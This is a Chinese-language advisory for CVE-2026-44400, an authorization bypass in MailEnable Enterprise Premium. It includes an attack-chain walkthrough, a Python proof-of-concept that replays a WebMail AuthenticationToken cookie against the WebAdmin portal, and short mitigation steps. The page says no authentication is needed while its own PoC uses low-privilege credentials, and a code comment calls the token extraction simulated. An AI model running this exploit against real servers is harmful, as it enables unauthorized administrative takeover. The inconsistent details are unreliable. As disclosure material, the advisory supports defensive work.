CVE-2026-44400 MailEnable授权绕过漏洞

漏洞信息

漏洞编号

CVE-2026-44400

漏洞类型

授权绕过

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MailEnable Enterprise Premium

漏洞概述

MailEnable Enterprise Premium 10.55及更早版本在WebAdmin移动门户中存在不正确的授权漏洞。攻击者能够重用为低权限用户生成的AuthenticationToken cookie来绕过身份验证检查。通过利用WebMail登录端点的PersistentLogin参数获取令牌，并将其重放到WebAdmin门户，攻击者可以执行高特权的管理操作，导致系统安全性完全失效。

技术细节

该漏洞的核心在于MailEnable Enterprise Premium的WebAdmin移动门户未能正确验证AuthenticationToken cookie的权限上下文。系统允许从WebMail模块获取的低权限令牌在WebAdmin模块中被接受。攻击者首先在WebMail登录过程中使用PersistentLogin参数获取一个有效的AuthenticationToken。由于系统在令牌验证时未严格区分模块权限，该令牌被错误地授予了WebAdmin的访问权限。通过重放该令牌，攻击者无需管理员凭据即可访问WebAdmin接口，执行包括创建用户、修改配置等在内的敏感操作。这属于典型的权限提升与认证绕过问题，攻击复杂度低且无需用户交互，危害性极高。

攻击链分析

STEP 1

步骤1：信息收集

识别目标服务器运行MailEnable Enterprise Premium 10.55或更早版本。

STEP 2

步骤2：获取令牌

攻击者使用低权限账户通过WebMail登录接口，利用PersistentLogin参数获取AuthenticationToken。

STEP 3

步骤3：重放攻击

将获取到的低权限AuthenticationToken放入HTTP请求头中，发送至WebAdmin移动门户接口。

STEP 4

步骤4：权限提升

由于验证逻辑缺陷，WebAdmin接受该令牌，攻击者获得管理员权限并执行敏感操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_host = "http://target-mailenable-server"
webmail_login_url = f"{target_host}/mailmail/login.aspx"
webadmin_url = f"{target_host}/webadmin/mobile/default.aspx"

# Attacker credentials (low privilege)
username = "low_priv_user"
password = "password123"

# Step 1: Authenticate via WebMail and obtain PersistentLogin token
print("[+] Attempting to login via WebMail to obtain token...")
session = requests.Session()
payload = {
    "username": username,
    "password": password,
    "PersistentLogin": "on"  # Trigger persistent token generation
}

response = session.post(webmail_login_url, data=payload)

# Extract the AuthenticationToken cookie (Simulated extraction)
auth_token = session.cookies.get('AuthenticationToken')

if auth_token:
    print(f"[+] Token found: {auth_token}")
    
    # Step 2: Replay the token against WebAdmin portal
    print("[+] Replaying token against WebAdmin portal...")
    admin_cookies = {'AuthenticationToken': auth_token}
    admin_response = requests.get(webadmin_url, cookies=admin_cookies)
    
    # Check if authentication bypass was successful
    if admin_response.status_code == 200 and "Dashboard" in admin_response.text:
        print("[!] Successfully accessed WebAdmin with low-privilege token!")
        print(f"[+] Response length: {len(admin_response.text)}")
    else:
        print("[-] Failed to bypass authentication.")
else:
    print("[-] Could not retrieve AuthenticationToken cookie.")

影响范围

MailEnable Enterprise Premium <= 10.55

防御指南

临时缓解措施

建议立即限制WebAdmin移动门户的网络访问，仅允许内部受信任的IP地址连接。同时，检查系统日志中是否存在异常的WebAdmin访问记录，并在应用补丁前强制注销所有当前活跃的用户会话。